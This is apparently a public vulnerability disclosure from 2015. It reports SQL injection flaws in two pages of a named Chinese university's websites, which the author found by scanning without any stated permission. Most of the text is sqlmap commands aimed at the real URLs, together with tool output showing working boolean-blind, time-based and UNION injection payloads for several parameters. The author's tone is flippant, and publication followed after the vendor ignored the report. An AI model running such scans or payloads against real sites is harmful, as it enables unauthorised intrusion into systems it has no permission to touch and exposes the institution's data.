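2015-08-13: Details have been reported to the vendor; waiting for the vendor to handle them
2015-08-18: The vendor has actively ignored the vulnerability; details are disclosed to the public
I love universities~~
I didn't dig deep, just did a rough scan and got 2 injection points.
Injection point 1: http://www.nwnu.edu.cn/cate.do?dept=0018
Injection point 2: http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198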
python sqlmap.py -u "http://www.nwnu.edu.cn/cate.do?dept=0018"
---
Parameter: dept (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: dept=0018' AND 6007=6007 AND 'WyuN'='WyuN
---
[01:30:29] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.2
python sqlmap.py -u "http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198"
sqlmap identified the following injection point(s) with a total of 1211 HTTP(s) requests:
---
Parameter: articleid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198) AND 2163=2163 AND (2552=2552

    Type: UNION query
    Title: Generic UNION query (88) - 6 columns
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=-3457) UNION ALL SELECT 88,88,88,88,88,CONCAT(0x716b717871,0x4e4d624f6d4952786350,0x71626b6b71)-- 

Parameter: webid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043) AND 3194=3194 AND (9197=9197&id=1000077&channelid=1000079&articleid=1001198

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043) AND (SELECT * FROM (SELECT(SLEEP(5)))nfLB) AND (7937=7937&id=1000077&channelid=1000079&articleid=1001198

    Type: UNION query
    Title: Generic UNION query (88) - 3 columns
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=-1937) UNION ALL SELECT 88,CONCAT(0x716b717871,0x47536b505553534a4e47,0x71626b6b71),88-- &id=1000077&channelid=1000079&articleid=1001198

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077) AND 4550=4550 AND (8947=8947&channelid=1000079&articleid=1001198
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: webid, type: Unescaped numeric (default)
[1] place: GET, parameter: id, type: Unescaped numeric
[2] place: GET, parameter: articleid, type: Unescaped numeric
[q] Quit
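I did not go any further with the second one; it is only given as proof.
You know~~
Severity: No impact, ignored by vendor
Ignored at: 2015-08-18 22:44
None yet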